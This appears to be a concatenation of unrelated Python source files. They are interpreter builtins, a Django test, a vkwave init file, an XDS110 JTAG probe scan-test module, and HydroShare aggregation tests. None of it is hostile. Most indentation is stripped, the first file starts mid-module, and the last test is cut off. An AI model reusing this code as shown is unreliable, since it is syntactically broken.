def get_name(obj, stale):
if stale is None:
name = naming.get_name(obj)
else:
name = naming.get_name(obj, stale.number)
if name is not None:
return String(name)
else:
return null
@builtin
@signature(Object, Object, optional=1)
def load(program, path):
if path is None:
path = null
else:
path = pathobj.to_path(path)
return from_object(program, path)
@builtin
def class_(argv):
exnihilo = argv[0]
parent = Object.interface
name = String(u"customobject")
assert 1 <= len(argv) <= 3
if len(argv) > 1:
parent = argv[1]
if len(argv) > 2:
name = argv[2]
assert isinstance(exnihilo, Exnihilo)
methods = {}
for key, index in exnihilo.map.attribute_indexes.items():
methods[key] = exnihilo.storage[index]
interface = Interface(
cast(parent, Interface, u"parent"),
cast(name, String, u"name").string,
methods,
CustomObject_instantiate)
core.g.finalizer_queue.register_finalizer(interface)
return interface
@builtin
@signature(Object)
def iter_(obj):
return obj.iter()
@builtin
@signature(Object)
def hash_(obj):
return Integer(obj.hash())
@builtin
@signature(Object)
def repr_(obj):
return String(obj.repr())
@builtin
@signature(List)
def reversed_(obj):
return ReversedListIterator(reversed(obj.contents))
class ReversedListIterator(Object):
_immutable_fields_ = ['iterator']
def __init__(self, iterator):
self.iterator = iterator
def iter(self):
return self
@ReversedListIterator.method(u"next", signature(ReversedListIterator))
def ReversedListIterator_next(self):
return self.iterator.next()
@builtin
@signature(Object, Object)
def getitem(obj, index):
return obj.getitem(index)
@builtin
@signature(Object, Object, Object)
def setitem(obj, index, value):
return obj.setitem(index, value)
@builtin
@signature(Object)
def listattr(obj):
return List(obj.listattr())
## The interface for analysing the interface.
@builtin
@signature(Interface)
def list_methods(interface):
out = []
for name in interface.methods:
out.append(String(name))
return List(out)
@builtin
@signature(Interface)
def list_multimethods(interface):
out = []
for record in interface.multimethods:
types = []
for ref in record.vec:
interface = ref.weakref()
if interface is not None:
types.append(interface)
if len(types) == len(record.vec):
row = Exnihilo()
row.setattr(u'multimethod', record.multimethod)
row.setattr(u'types', List(types))
out.append(row)
return List(out)
@builtin
@signature(Object, String)
def getattr(obj, index):
return obj.getattr(index.string)
@builtin
@signature(Object, String, Object, optional=1)
def getattr_or(obj, index, default):
if default is None:
default = null
return obj.getattr_or(index.string, default)
@builtin
@signature(Object, String, Object)
def setattr(obj, index, value):
return obj.setattr(index.string, value)
@builtin
@signature(String)
def ord_(string):
if len(string.string) != 1:
raise unwind(LError(u"ord expects a char"))
return Integer(ord(string.string[0]))
@builtin
@signature(Integer)
def chr_(value):
return String(unichr(value.value))
@builtin
@signature(Object, Object)
def isinstance_(value, which_list):
if isinstance(which_list, List):
whichs = which_list.contents
else:
whichs = [which_list]
interface = get_interface(value)
while interface is not null:
if interface in whichs:
return true
# There should be exactly one recursively defined interface.
if interface.parent is interface:
return false
interface = interface.parent
return false
@builtin
@signature(String, Integer, optional=1)
def parse_int(string, base):
return Integer(parse_int_(string, base))
@builtin
@signature(String)
def parse_float(string):
return FloatRepr(string)
# And and or are macros in the compiler. These are
# convenience functions, likely not often used.
# erm. Actually 'and' function is used by chaining.
@builtin
@signature(Object, Object)
def and_(a, b):
return boolean(is_true(a) and is_true(b))
@builtin
@signature(Object, Object)
def or_(a, b):
return boolean(is_true(a) or is_true(b))
@builtin
@signature(Object)
def len_(obj):
return obj.getattr(u'length')
@builtin
@signature(Object)
def not_(a):
return boolean(is_false(a))
@builtin
@signature(String)
def encode_utf8(value):
return to_uint8array(value.string.encode('utf-8'))
@builtin
@signature(Uint8Data)
def decode_utf8(value):
try:
return String(value.to_str().decode('utf-8'))
except UnicodeDecodeError as error:
raise space.unwind(space.LError(u"unicode decode failed"))
@builtin
def time_(argv):
return Float(time.time())
@builtin
@signature()
def getcwd():
return pathobj.getcwd()
@builtin
@signature(Object)
def chdir(obj):
pathobj.chdir(obj)
return null
@builtin
@signature(Integer, Integer, Integer, optional=2)
def range_(start, stop, step):
if stop is None:
stop = start.value
start = 0
else:
start = start.value
stop = stop.value
if step is None:
step = 1
else:
step = step.value
if step == 0:
raise unwind(LTypeError(u"step==0"))
return Range(start, stop, step)
class Range(Object):
__slots__ = ['start', 'stop', 'step', 'sign', 'current']
_immutable_fields_ = ['start', 'stop', 'step', 'sign']
def __init__(self, start, stop, step):
self.current = start
self.stop = stop
self.step = step
self.sign = +1 if step >= 0 else -1
def iter(self):
return self
@Range.method(u"next", signature(Range))
def Range_next(self):
if self.current*self.sign < self.stop*self.sign:
i = self.current
self.current += self.step
return Integer(i)
raise StopIteration()
@builtin
@signature(Interface)
def super_(interface):
return interface.parent
#@builtin
#@signature(Object)
#def attach_debugger(debugger):
# ec = main.get_ec()
# ec.debug_hook = debugger
# return null
import rlibuv as uv
@builtin
@signature(space.Integer, optional=1)
def exit(obj):
ec = core.get_ec()
ec.exit_status = 0 if obj is None else int(obj.value)
uv.stop(ec.uv_loop)
ec.enqueue(ec.current) # Trick to ensure we get Discard -exception here
return core.switch([ec.eventloop]) # Once they are created.
@builtin
@signature()
def getcurrent():
return core.get_ec().current
@builtin
@signature()
def new_log():
queue = Queue()
if queue in core.g.log.loggers:
raise unwind(LError(u"queue has been registered twice."))
core.g.log.loggers.append(queue)
return queue
@builtin
def print_(argv):
core.g.log.other(u"info", List(argv))
return null
@builtin
@signature(Object, String, optional=1)
def info(value, type):
if type is None:
core.g.log.other(u"info", value)
else:
core.g.log.other(type.string, value)
return null
@builtin
@signature(Object)
def print_traceback(exception):
core.g.log.exception(exception)
return null
@builtin
@signature(Object)
def format_traceback(exception):
return String(format_traceback_raw(exception))
def format_traceback_raw(exception, in_exception_repr=False):
traceback = exception.getattr(u"traceback")
if not isinstance(traceback, space.List):
raise space.unwind(space.LError(u"Expected null or list as .traceback: %s" % traceback.repr()))
out = u""
if len(traceback.contents) > 0:
out = u"\033[31mTraceback:\033[36m\n"
for entry in reversed(traceback.contents):
if not isinstance(entry, TraceEntry):
continue
name, col0, lno0, col1, lno1 = entry.pc_location()
out += u" %s: %d,%d : %d,%d\n" % (name.repr(), lno0, col0, lno1, col1)
out += u"\033[31m"
out += space.get_interface(exception).name
out += u":\033[0m"
try:
return out + u" " + exception.repr()
except Unwinder as unwinder:
if in_exception_repr:
return out + u" ... Second error during exception repr"
return (out + u" ... Error during exception repr\n"
+ format_traceback_raw(unwinder.exception, True))
from rpython.rtyper.lltypesystem import rffi, lltype, llmemory
from rpython.rlib import jit, rgil
import rlibuv as uv
import uv_callback
@builtin
@signature(Object, variadic=True)
def work(func, args):
if not core.g.work_pool:
# The function will be called in separate thread,
# so allocate GIL here
rgil.allocate()
core.g.work_pool = WorkPool()
req = lltype.malloc(uv.work_ptr.TO, flavor='raw', zero=True)
work = Work(func, args)
core.g.work_pool.push(req, work)
try:
response = uv_callback.after_work(req)
response.wait(uv.queue_work(response.ec.uv_loop, req,
work_cb, uv_callback.after_work.cb))
if work.unwinder:
raise work.unwinder
return work.retval
finally:
core.g.work_pool.pop(req)
lltype.free(req, flavor='raw')
def work_cb(handle):
work = core.g.work_pool.peek(handle)
#must_leave = False
# must_leave = space.threadlocals.try_enter_thread(space)
# Should check for separate threads here and crash
# if the callback comes from a thread that has no execution context.
try:
work.retval = work.func.call(work.args)
except Unwinder as unwinder:
work.unwinder = unwinder
except Exception as e:
try:
os.write(2, "SystemError: callback raised ")
os.write(2, str(e))
os.write(2, "\n")
except:
pass
# if must_leave:
# space.threadlocals.leave_thread(space)
class WorkPool:
def __init__(self):
self.table = {}
@jit.dont_look_inside
def peek(self, handle):
return self.table[rffi.cast_ptr_to_adr(handle)]
@jit.dont_look_inside
def push(self, handle, value):
self.table[rffi.cast_ptr_to_adr(handle)] = value
@jit.dont_look_inside
def pop(self, handle):
return self.table.pop(rffi.cast_ptr_to_adr(handle))
class Work:
def __init__(self, func, args):
self.func = func
self.args = args
self.retval = null
self.unwinder = None
@builtin
@signature(Integer)
def guess_handle(num):
return Integer(uv_stream.uv.guess_handle(num.value))
@builtin
@signature(Object)
def instantiate_(i):
    if i == Object.interface:
return Exnihilo()
if isinstance(i, Interface):
return CustomObject(i)
raise OldError(u"Cannot instantiate from non-interface")
@builtin
@signature(Object)
def register_finalizer(obj):
core.g.finalizer_queue.register_finalizer(obj)
return null
# @builtin
# @signature(Object)
# def finalize_on_exit(obj):
# ec = core.get_ec()
# ec.must_finalize_on_quit[obj] = true
# return null
@builtin
def on_exit(argv):
ec = core.get_ec()
ec.on_exit.append(argv)
return null
|
advisor_server/suggestion/algorithm/base_hyperopt_algorithm_test.py | silvery107/advisor | 1,498 | 12729163 | from django.test import TestCase
from suggestion.algorithm.abstract_algorithm import AbstractSuggestionAlgorithm
from suggestion.algorithm.base_hyperopt_algorithm import BaseHyperoptAlgorithm
class BaseHyperoptAlgorithmTest(TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_init(self):
instance = BaseHyperoptAlgorithm()
self.assertTrue(isinstance(instance, AbstractSuggestionAlgorithm))
self.assertEqual(instance.__class__, BaseHyperoptAlgorithm)
|
vkwave/bots/core/dispatching/extensions/callback/__init__.py | krasnovmv/vkwave | 222 | 12729230 | <filename>vkwave/bots/core/dispatching/extensions/callback/__init__.py
from ._aiohttp import AIOHTTPCallbackExtension
|
source/lib/probe.py | WinterWinds-Robotics/pymmw | 144 | 12729240 | <filename>source/lib/probe.py
#
# Copyright (c) 2019, <NAME>
# This file is licensed under the terms of the MIT license.
#
#
# xds110 support
#
import sys
import time
import array
from lib.ports import *
from lib.utility import *
from lib.shell import *
# ------------------------------------------
XDS_USB = (0x0451, 0xbef3)
# ------------------------------------------
def xds_reset(dev, delay=100):
#_ = {0:'CDC Communication',
# 1:'CDC Data', 2:'Vendor Specific', 3:'CDC Communication',
# 4:'CDC Data', 5:'Human Interface Device', 6:'Vendor Specific'}
ep = usb_point(dev, 2, 2)
if ep is None: return False
for v in ('00', '01') * 2:
ep.write(hex2dec('{} {} {} {}'.format('2a', '02', '00', '0e {}'.format(v))))
time.sleep(delay / 1000)
return True
# ------------------------------------------
__scan_test__ = (
'2a 01 00 01',
'2a 01 00 03', '2a 05 00 04 00 00 00 00',
'2a 01 00 06', '2a 02 00 05 00', '2a 05 00 07 88 13 00 00',
'2a 02 00 05 01', '2a 05 00 07 a0 86 01 00',
'2a 05 00 2b 01 00 00 00',
'2a 01 00 06', '2a 02 00 05 00', '2a 05 00 07 88 13 00 00',
'2a 02 00 05 01', '2a 05 00 07 a0 86 01 00', '2a 09 00 09 01 00 00 00 01 00 00 00',
'2a 01 00 1a',
'2a 01 00 2f',
'2a 01 00 02',
'2a 01 00 01',
'2a 01 00 03', '2a 05 00 04 00 00 00 00',
'2a 01 00 06', '2a 02 00 05 00', '2a 05 00 07 88 13 00 00',
'2a 02 00 05 01', '2a 05 00 07 a0 86 01 00',
'2a 05 00 2b 01 00 00 00',
'2a 10 00 0a 00 08 04 01 06 01 00 00 00 00 00 00 01 00 01',
'2a 13 01 0c 00 08 04 01 06 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('ff ff ff ff',)*4*16)),
'2a 13 01 0c 00 08 04 01 06 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('00 00 00 00',)*4*16)),
'2a 13 01 0c 00 08 04 01 06 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('00 00 00 00',)*4*16)),
'2a 13 01 0c 00 08 04 01 06 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('ff ff ff ff',)*4*16)),
'2a 10 00 0a 00 08 03 01 05 01 00 00 00 00 00 00 01 00 01',
'2a 13 01 0c 00 08 03 01 05 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('ff ff ff ff',)*4*16)),
'2a 13 01 0c 00 08 03 01 05 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('00 00 00 00',)*4*16)),
'2a 13 01 0c 00 08 03 01 05 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('00 00 00 00',)*4*16)),
'2a 13 01 0c 00 08 03 01 05 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('ff ff ff ff',)*4*16)),
'2a 15 00 0b 20 00 04 01 06 01 00 00 00 00 00 00 01 00 04 00 ff ff ff ff',
'2a 13 01 0c 00 08 04 01 06 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('ff ff ff ff',)*4*16)),
'2a 15 00 0b 20 00 04 01 06 01 00 00 00 00 00 00 01 00 04 00 00 00 00 00',
'2a 13 01 0c 00 08 04 01 06 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('00 00 00 00',)*4*16)),
'2a 15 00 0b 20 00 04 01 06 01 00 00 00 00 00 00 01 00 04 00 e2 e0 03 fe',
'2a 13 01 0c 00 08 04 01 06 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('e2 e0 03 fe',)*4*16)),
'2a 15 00 0b 20 00 04 01 06 01 00 00 00 00 00 00 01 00 04 00 1d 1f fc 01',
'2a 13 01 0c 00 08 04 01 06 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('1d 1f fc 01',)*4*16)),
'2a 15 00 0b 20 00 04 01 06 01 00 00 00 00 00 00 01 00 04 00 aa cc 33 55',
'2a 13 01 0c 00 08 04 01 06 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('aa cc 33 55',)*4*16)),
'2a 15 00 0b 20 00 04 01 06 01 00 00 00 00 00 00 01 00 04 00 55 33 cc aa',
'2a 13 01 0c 00 08 04 01 06 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('55 33 cc aa',)*4*16)),
'2a 10 00 0a 00 08 04 01 06 01 00 00 00 00 00 00 01 00 01',
'2a 01 00 08',
'2a 09 00 09 05 00 00 00 02 00 00 00',
'2a 15 00 0b 20 00 03 01 05 01 00 00 00 00 00 00 01 00 04 00 ff ff ff ff',
'2a 13 01 0c 00 08 03 01 05 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('ff ff ff ff',)*4*16)),
'2a 15 00 0b 20 00 03 01 05 01 00 00 00 00 00 00 01 00 04 00 00 00 00 00',
'2a 13 01 0c 00 08 03 01 05 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('00 00 00 00',)*4*16)),
'2a 15 00 0b 20 00 03 01 05 01 00 00 00 00 00 00 01 00 04 00 e2 e0 03 fe',
'2a 13 01 0c 00 08 03 01 05 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('e2 e0 03 fe',)*4*16)),
'2a 15 00 0b 20 00 03 01 05 01 00 00 00 00 00 00 01 00 04 00 1d 1f fc 01',
'2a 13 01 0c 00 08 03 01 05 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('1d 1f fc 01',)*4*16)),
'2a 15 00 0b 20 00 03 01 05 01 00 00 00 00 00 00 01 00 04 00 aa cc 33 55',
'2a 13 01 0c 00 08 03 01 05 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('aa cc 33 55',)*4*16)),
'2a 15 00 0b 20 00 03 01 05 01 00 00 00 00 00 00 01 00 04 00 55 33 cc aa',
'2a 13 01 0c 00 08 03 01 05 01 00 00 00 00 00 00 01 00 00 01 00 01 {}'.format(' '.join(('55 33 cc aa',)*4*16)),
'2a 01 00 1a',
'2a 01 00 2f',
'2a 01 00 02'
)
# ------------------------------------------
def xds_test(dev, reset=True):
if reset:
xds_reset(dev)
ep2o = usb_point(dev, 2, 2)
ep2i = usb_point(dev, 2, 3)
_ = dev.read(ep2i.bEndpointAddress, 1024)
def send(epo, msg, epi=None):
_ = epo.write(hex2dec(msg))
if epi is not None:
buf = dev.read(epi.bEndpointAddress, 1024)
return buf
return None
def collect(v):
res = send(ep2o, v, ep2i)
if res is not None:
if len(res) > 21:
res = set(res[8:])
if len(res) % 3 != 1: # super-lazy check
return False
return True
for entry in __scan_test__:
if not collect(entry):
raise Exception('integrity scan-test on the JTAG DR/IR has failed')
|
pytest/functional/hs_file_types/test_model_instance_aggregation.py | hydroshare/hydroshare | 178 | 12729245 | import os
import pytest
from django.core.exceptions import ValidationError
from django.core.files.uploadedfile import UploadedFile
from hs_core.hydroshare import add_file_to_resource, ResourceFile, add_resource_files
from hs_core.views.utils import move_or_rename_file_or_folder
from hs_file_types.forms import ModelInstanceMetadataValidationForm
from hs_file_types.models import (
ModelInstanceLogicalFile,
ModelProgramLogicalFile,
NetCDFLogicalFile,
GeoRasterLogicalFile,
GeoFeatureLogicalFile,
GenericLogicalFile,
TimeSeriesLogicalFile,
RefTimeseriesLogicalFile,
FileSetLogicalFile
)
@pytest.mark.django_db(transaction=True)
def test_link_model_aggregations_same_resource(composite_resource_with_mi_aggregation, mock_irods):
"""Test that we can link one model instance aggregation to one model program aggregation within the same resource"""
res, user = composite_resource_with_mi_aggregation
assert ModelInstanceLogicalFile.objects.count() == 1
mi_aggr = ModelInstanceLogicalFile.objects.first()
# check that mi_aggr is not related to any model program aggregation
assert mi_aggr.metadata.executed_by is None
# create a model program aggregation
file_path = 'pytest/assets/logan.vrt'
upload_folder = ''
file_to_upload = UploadedFile(file=open(file_path, 'rb'),
name=os.path.basename(file_path))
res_file = add_file_to_resource(
res, file_to_upload, folder=upload_folder, check_target_folder=True
)
assert ModelProgramLogicalFile.objects.count() == 0
# set file to model program aggregation type
ModelProgramLogicalFile.set_file_type(res, user, res_file.id)
assert ModelProgramLogicalFile.objects.count() == 1
mp_aggr = ModelProgramLogicalFile.objects.first()
# link model instance aggregation to model program aggregation
mi_validation_form = ModelInstanceMetadataValidationForm(data={"executed_by": mp_aggr.id}, user=user, resource=res)
assert mi_validation_form.is_valid()
mi_validation_form.update_metadata(metadata=mi_aggr.metadata)
mi_aggr = ModelInstanceLogicalFile.objects.first()
# check that mi_aggr is related to model program aggregation
assert mi_aggr.metadata.executed_by is not None
assert not res.dangling_aggregations_exist()
@pytest.mark.django_db(transaction=True)
def test_model_instance_on_model_program_delete(composite_resource_with_mi_aggregation, mock_irods):
"""Test that when we remove/delete a model program aggregation that the linked model instance aggregation does not
get deleted and the metadata of the model instance aggregation is set to dirty"""
res, user = composite_resource_with_mi_aggregation
assert ModelInstanceLogicalFile.objects.count() == 1
mi_aggr = ModelInstanceLogicalFile.objects.first()
# check that mi_aggr is not related to any model program aggregation
assert mi_aggr.metadata.executed_by is None
# create a model program aggregation
file_path = 'pytest/assets/logan.vrt'
upload_folder = ''
file_to_upload = UploadedFile(file=open(file_path, 'rb'),
name=os.path.basename(file_path))
res_file = add_file_to_resource(
res, file_to_upload, folder=upload_folder, check_target_folder=True
)
assert ModelProgramLogicalFile.objects.count() == 0
# set file to model program aggregation type
ModelProgramLogicalFile.set_file_type(res, user, res_file.id)
assert ModelProgramLogicalFile.objects.count() == 1
mp_aggr = ModelProgramLogicalFile.objects.first()
# link model instance aggregation to model program aggregation
mi_validation_form = ModelInstanceMetadataValidationForm(data={"executed_by": mp_aggr.id}, user=user, resource=res)
assert mi_validation_form.is_valid()
mi_validation_form.update_metadata(metadata=mi_aggr.metadata)
mi_aggr = ModelInstanceLogicalFile.objects.first()
# check that mi_aggr is related to model program aggregation
assert mi_aggr.metadata.executed_by is not None
assert mi_aggr.metadata.is_dirty is True
# remove/delete mp_aggregation
mp_aggr.remove_aggregation()
assert ModelProgramLogicalFile.objects.count() == 0
assert ModelInstanceLogicalFile.objects.count() == 1
mi_aggr = ModelInstanceLogicalFile.objects.first()
# check that mi_aggr is not related to any model program aggregation
assert mi_aggr.metadata.executed_by is None
# check that mi_aggr metadata is set to dirty
assert mi_aggr.metadata.is_dirty is True
assert not res.dangling_aggregations_exist()
@pytest.mark.django_db(transaction=True)
def test_model_instance_on_model_program_rename_1(composite_resource_with_mi_aggregation, mock_irods):
"""Test that when we rename a file that represents a model program aggregation then the linked model instance
aggregation metadata is set to dirty"""
res, user = composite_resource_with_mi_aggregation
assert ModelInstanceLogicalFile.objects.count() == 1
mi_aggr = ModelInstanceLogicalFile.objects.first()
# check that mi_aggr is not related to any model program aggregation
assert mi_aggr.metadata.executed_by is None
# create a model program aggregation
file_path = 'pytest/assets/logan.vrt'
upload_folder = ''
file_to_upload = UploadedFile(file=open(file_path, 'rb'),
name=os.path.basename(file_path))
res_file = add_file_to_resource(
res, file_to_upload, folder=upload_folder, check_target_folder=True
)
assert ModelProgramLogicalFile.objects.count() == 0
# set file to model program aggregation type
ModelProgramLogicalFile.set_file_type(res, user, res_file.id)
assert ModelProgramLogicalFile.objects.count() == 1
mp_aggr = ModelProgramLogicalFile.objects.first()
# link model instance aggregation to model program aggregation
mi_validation_form = ModelInstanceMetadataValidationForm(data={"executed_by": mp_aggr.id}, user=user, resource=res)
assert mi_validation_form.is_valid()
mi_validation_form.update_metadata(metadata=mi_aggr.metadata)
mi_aggr = ModelInstanceLogicalFile.objects.first()
# check that mi_aggr is related to model program aggregation
assert mi_aggr.metadata.executed_by is not None
assert mi_aggr.metadata.is_dirty is True
# rename the model program file name
src_path = 'data/contents/{}'.format(res_file.file_name)
tgt_path = 'data/contents/{}'.format("logan_1.vrt")
move_or_rename_file_or_folder(user, res.short_id, src_path, tgt_path)
assert ModelProgramLogicalFile.objects.count() == 1
assert ModelInstanceLogicalFile.objects.count() == 1
mi_aggr = ModelInstanceLogicalFile.objects.first()
# check that mi_aggr metadata is set to dirty
assert mi_aggr.metadata.is_dirty is True
assert not res.dangling_aggregations_exist()
@pytest.mark.django_db(transaction=True)
def test_model_instance_on_model_program_rename_2(composite_resource_with_mi_aggregation, mock_irods):
"""Test that when we rename a folder that represents a model program aggregation then the linked model instance
aggregation metadata is set to dirty"""
res, user = composite_resource_with_mi_aggregation
assert ModelInstanceLogicalFile.objects.count() == 1
mi_aggr = ModelInstanceLogicalFile.objects.first()
# check that mi_aggr is not related to any model program aggregation
assert mi_aggr.metadata.executed_by is None
# create a model program aggregation
file_path = 'pytest/assets/logan.vrt'
mp_folder = "mp_folder"
ResourceFile.create_folder(res, mp_folder)
file_to_upload = UploadedFile(file=open(file_path, 'rb'),
name=os.path.basename(file_path))
add_file_to_resource(
res, file_to_upload, folder=mp_folder, check_target_folder=True
)
assert ModelProgramLogicalFile.objects.count() == 0
# set file to model program aggregation type
ModelProgramLogicalFile.set_file_type(res, user, folder_path=mp_folder)
assert ModelProgramLogicalFile.objects.count() == 1
mp_aggr = ModelProgramLogicalFile.objects.first()
# link model instance aggregation to model program aggregation
mi_validation_form = ModelInstanceMetadataValidationForm(data={"executed_by": mp_aggr.id}, user=user, resource=res)
assert mi_validation_form.is_valid()
mi_validation_form.update_metadata(metadata=mi_aggr.metadata)
mi_aggr = ModelInstanceLogicalFile.objects.first()
# check that mi_aggr is related to model program aggregation
assert mi_aggr.metadata.executed_by is not None
assert mi_aggr.metadata.is_dirty is True
    # rename the folder that represents the model program aggregation
src_path = 'data/contents/{}'.format(mp_folder)
tgt_path = 'data/contents/{}'.format("{}_1".format(mp_folder))
move_or_rename_file_or_folder(user, res.short_id, src_path, tgt_path)
assert ModelProgramLogicalFile.objects.count() == 1
assert ModelInstanceLogicalFile.objects.count() == 1
mi_aggr = ModelInstanceLogicalFile.objects.first()
# check that mi_aggr metadata is set to dirty
assert mi_aggr.metadata.is_dirty is True
assert not res.dangling_aggregations_exist()
@pytest.mark.django_db(transaction=True)
def test_set_metadata(composite_resource_with_mi_aggregation, mock_irods):
"""Test that we can store all metadata items for a model instance aggregation"""
res, _ = composite_resource_with_mi_aggregation
mi_aggr = ModelInstanceLogicalFile.objects.first()
# test extra metadata
assert not mi_aggr.metadata.extra_metadata
extra_meta = {'key1': 'value 1', 'key2': 'value 2'}
mi_aggr.metadata.extra_metadata = extra_meta
mi_aggr.metadata.save()
assert mi_aggr.metadata.extra_metadata == extra_meta
# test keywords
assert not mi_aggr.metadata.keywords
keywords = ['kw-1', 'kw-2']
mi_aggr.metadata.keywords = keywords
mi_aggr.metadata.save()
assert mi_aggr.metadata.keywords == keywords
# test coverage metadata
assert not mi_aggr.metadata.coverages.all()
value_dict = {'name': 'Name for period coverage', 'start': '1/1/2000', 'end': '12/12/2012'}
temp_cov = mi_aggr.metadata.create_element('coverage', type='period', value=value_dict)
assert temp_cov.value['name'] == 'Name for period coverage'
assert temp_cov.value['start'] == '1/1/2000'
assert temp_cov.value['end'] == '12/12/2012'
assert mi_aggr.metadata.coverages.all().count() == 1
value_dict = {'east': '56.45678', 'north': '12.6789', 'units': 'Decimal degree'}
spatial_cov = mi_aggr.metadata.create_element('coverage', type='point', value=value_dict)
assert spatial_cov.value['projection'] == 'WGS 84 EPSG:4326'
assert spatial_cov.value['units'] == 'Decimal degree'
assert spatial_cov.value['north'] == 12.6789
assert spatial_cov.value['east'] == 56.45678
assert mi_aggr.metadata.coverages.all().count() == 2
# test model output metadata
assert not mi_aggr.metadata.has_model_output
mi_aggr.metadata.has_model_output = True
mi_aggr.metadata.save()
# test setting metadata json
assert not mi_aggr.metadata.metadata_json
# set mi metadata json from the content of the following file
schema_file_path = 'pytest/assets/mi_metadata.json'
with open(schema_file_path, 'r') as file_obj:
meta_json = file_obj.read()
assert len(meta_json) > 0
mi_aggr.metadata.metadata_json = meta_json
mi_aggr.metadata.save()
mi_aggr = ModelInstanceLogicalFile.objects.first()
assert mi_aggr.metadata.metadata_json
assert not res.dangling_aggregations_exist()
@pytest.mark.django_db(transaction=True)
def test_auto_netcdf_aggregation_creation(composite_resource_with_mi_aggregation_folder, mock_irods):
"""Test that when a netcdf file is uploaded to a folder that represents a model instance aggregation,
a netcdf aggregation is created automatically"""
resource, _ = composite_resource_with_mi_aggregation_folder
mi_aggr_path = ModelInstanceLogicalFile.objects.first().aggregation_name
assert NetCDFLogicalFile.objects.count() == 0
# upload a netcdf file to the mi_aggr_path - folder that represents the model instance aggregation
nc_file_name = "netcdf_valid.nc"
netcdf_file_path = "hs_file_types/tests/{}".format(nc_file_name)
_add_files_to_resource(resource=resource, files_to_add=[netcdf_file_path], upload_folder=mi_aggr_path)
    # there should be three resource files - one extra file generated as part of netcdf aggregation creation
assert resource.files.all().count() == 3
assert NetCDFLogicalFile.objects.count() == 1
# the netcdf file added to the model instance folder should be part of a new netcdf aggregation
nc_res_file = ResourceFile.get(resource=resource,
file=nc_file_name, folder=mi_aggr_path)
assert nc_res_file.has_logical_file
# the netcdf aggregation should contain 2 files - nc and the txt files
assert NetCDFLogicalFile.objects.first().files.count() == 2
assert not resource.dangling_aggregations_exist()
@pytest.mark.django_db(transaction=True)
def test_auto_raster_aggregation_creation(composite_resource_with_mi_aggregation_folder, mock_irods):
"""Test that when a raster file (.tif) is uploaded to a folder that represents a model instance aggregation,
a raster aggregation is created automatically"""
resource, _ = composite_resource_with_mi_aggregation_folder
mi_aggr_path = ModelInstanceLogicalFile.objects.first().aggregation_name
assert GeoRasterLogicalFile.objects.count() == 0
# upload a raster file to the mi_aggr_path - folder that represents the model instance aggregation
raster_file_name = 'small_logan.tif'
raster_file_path = 'hs_file_types/tests/{}'.format(raster_file_name)
_add_files_to_resource(resource=resource, files_to_add=[raster_file_path], upload_folder=mi_aggr_path)
# there should be three resource files ( one extra vrt file added as part of raster aggregation creation)
assert resource.files.all().count() == 3
# there should be one raster aggregation now
assert GeoRasterLogicalFile.objects.count() == 1
# the tif file added to the model instance folder should be part of a new raster aggregation
raster_res_file = ResourceFile.get(resource=resource,
file=raster_file_name, folder=mi_aggr_path)
assert raster_res_file.has_logical_file
# the raster aggregation should contain 2 files (tif and vrt)
assert GeoRasterLogicalFile.objects.first().files.count() == 2
assert not resource.dangling_aggregations_exist()
@pytest.mark.django_db(transaction=True)
def test_auto_geofeature_aggregation_creation(composite_resource_with_mi_aggregation_folder, mock_irods):
"""Test that when files that represents a geofeature are uploaded to a folder that
represents a model instance, a geofeature aggregation is created automatically"""
resource, _ = composite_resource_with_mi_aggregation_folder
mi_aggr_path = ModelInstanceLogicalFile.objects.first().aggregation_name
assert GeoFeatureLogicalFile.objects.count() == 0
    # upload all 4 geo feature files to the mi_aggr_path - folder that represents the model instance aggregation
base_data_file_path = 'hs_file_types/tests/data/{}'
shp_file_name = "states.shp"
shp_file_path = base_data_file_path.format(shp_file_name)
shx_file_name = "states.shx"
shx_file_path = base_data_file_path.format(shx_file_name)
dbf_file_name = "states.dbf"
dbf_file_path = base_data_file_path.format(dbf_file_name)
prj_file_name = "states.prj"
prj_file_path = base_data_file_path.format(prj_file_name)
geo_feature_files = [shp_file_path, shx_file_path, dbf_file_path, prj_file_path]
_add_files_to_resource(resource=resource, files_to_add=geo_feature_files, upload_folder=mi_aggr_path)
# there should be five resource files
assert resource.files.all().count() == 5
# the shp file added to the model instance folder should be part of a new geo feature aggregation
shp_res_file = ResourceFile.get(resource=resource, file=shp_file_name, folder=mi_aggr_path)
assert shp_res_file.has_logical_file
# the geo feature aggregation should contain 4 files that we uploaded
assert GeoFeatureLogicalFile.objects.first().files.count() == 4
assert not resource.dangling_aggregations_exist()
@pytest.mark.django_db(transaction=True)
def test_auto_timeseries_aggregation_creation(composite_resource_with_mi_aggregation_folder, mock_irods):
"""Test that when a timeseries sqlite file is uploaded to a folder that
represents a model instance, a timeseries aggregation is created automatically from that sqlite file"""
resource, _ = composite_resource_with_mi_aggregation_folder
mi_aggr_path = ModelInstanceLogicalFile.objects.first().aggregation_name
assert TimeSeriesLogicalFile.objects.count() == 0
# upload a sqlite file to the mi_aggr_path - folder that represents the model instance aggregation
sqlite_file_name = 'ODM2_Multi_Site_One_Variable.sqlite'
sqlite_file_path = 'hs_file_types/tests/data/{}'.format(sqlite_file_name)
_add_files_to_resource(resource=resource, files_to_add=[sqlite_file_path], upload_folder=mi_aggr_path)
# there should be 2 resource files
